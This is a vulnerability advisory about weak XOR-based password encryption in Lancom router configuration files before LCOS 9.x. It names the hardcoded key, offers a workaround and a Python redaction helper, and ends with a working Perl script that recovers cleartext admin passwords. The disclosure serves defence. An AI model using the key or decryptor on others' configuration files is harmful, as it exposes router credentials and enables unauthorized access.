Vulnerability Report: Lancom Router Weak Password Encryption (pre LCOS 9.x)

Sorry for the late re-discovery: the issue was found and reported in 2009, but was accidentally buried on my side and was only re-discovered in late 2016.


Problem

The encryption of passwords in router configuration files can trivially be broken.

Systems affected

System tested: Lancom 1751 UMTS, LCOS 7.62.0042 (dated 05.03.2009)

Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)


Explanation

When exporting the configuration into a text file, you can find the encrypted admin password in the section {Secrets} under the key 2.1 (in this demo case the password is "dummy"):

{Secrets}
2.1 == 2f1b18091d

The secret is decrypted by simply XORing it byte-wise with the hardcoded string "Knuddelbaerchen" (which is German for "cuddly baby bear"). The key is repeated if the secret is longer than the key.


Fix

The affected LCOS versions pre-dating LCOS v9.x are no longer supported. Newer models / versions are not affected.

Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).

Thank you to Lancom for quickly responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).


Workaround

When exporting the config file, store it only in a protected location and treat it as if the passwords in it were clear text, as advised in the manual.

When forwarding it to support, vendors or consultants please remove the {Secrets} section (especially the key 2.1).
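
The workaround above as an added example (not part of the original advisory and not Lancom tooling): a Python filter that drops the {Secrets} section from an exported configuration before it is forwarded, and reports which entries were only obscured with the legacy key. The `{Name}` section-header syntax and the `{Setup}` / `{Other}` sample lines are assumptions; only `{Secrets}` and `2.1 == 2f1b18091d` come from the advisory.

```python
import re

# Constructed sample export. Only the {Secrets} header and the "2.1" entry
# come from the advisory; the other sections and keys are made up.
SAMPLE_EXPORT = """\
{Setup}
1.1 == demo-router
{Secrets}
2.1 == 2f1b18091d
2.7 == zz-not-hex
{Other}
9.9 == keep-me
"""

LEGACY_KEY = b"Knuddelbaerchen"          # hardcoded key named in the advisory
SECTION = re.compile(r"^\{(.+)\}\s*$")   # assumed section header syntax
ENTRY = re.compile(r"^(\S+)\s*==\s*(\S+)\s*$")


def is_weakly_obscured(hex_value):
    """True if the value XORs with the legacy key to printable ASCII."""
    try:
        raw = bytes.fromhex(hex_value)
    except ValueError:
        return False
    plain = bytes(b ^ LEGACY_KEY[i % len(LEGACY_KEY)] for i, b in enumerate(raw))
    return bool(plain) and all(0x20 <= c < 0x7F for c in plain)


def redact_secrets(export_text):
    """Return (sanitized_text, keys_flagged) with the {Secrets} section removed."""
    kept, flagged, in_secrets = [], [], False
    for line in export_text.splitlines():
        header = SECTION.match(line)
        if header:
            in_secrets = header.group(1) == "Secrets"
            if in_secrets:
                continue                  # drop the section header too
        elif in_secrets:
            entry = ENTRY.match(line)
            if entry and is_weakly_obscured(entry.group(2)):
                flagged.append(entry.group(1))
            continue                      # drop every line inside {Secrets}
        kept.append(line)
    return "\n".join(kept) + "\n", flagged
```

Any key returned in the flagged list held a password that must be considered disclosed to anyone who has seen the unredacted file, so change it on the device.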


Proof of Concept

#!/usr/bin/perl -w
#----------------------------------------------------------------------
#
# ./lancom-pw-decrypt.pl ....pw....


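use strict;

# Hardcoded XOR key used by LCOS before v9.x
my $key = "Knuddelbaerchen";

# Hex string taken from the {Secrets} section, e.g. 2f1b18091d
die "usage: $0 <hex-encoded secret>\n" unless @ARGV == 1;
my $text = pack('H*', $ARGV[0]);

# Repeat the key so it is at least as long as the secret
my $len  = length($text);
my $xlen = int(($len / length($key)) + 1);

# Byte-wise XOR, then cut the result back to the length of the secret
my $result = $text ^ ($key x $xlen);
$result = substr($result, 0, $len);

print "$result\n";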


#----------------------------------------------------------------------
# 2009/2016       
# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/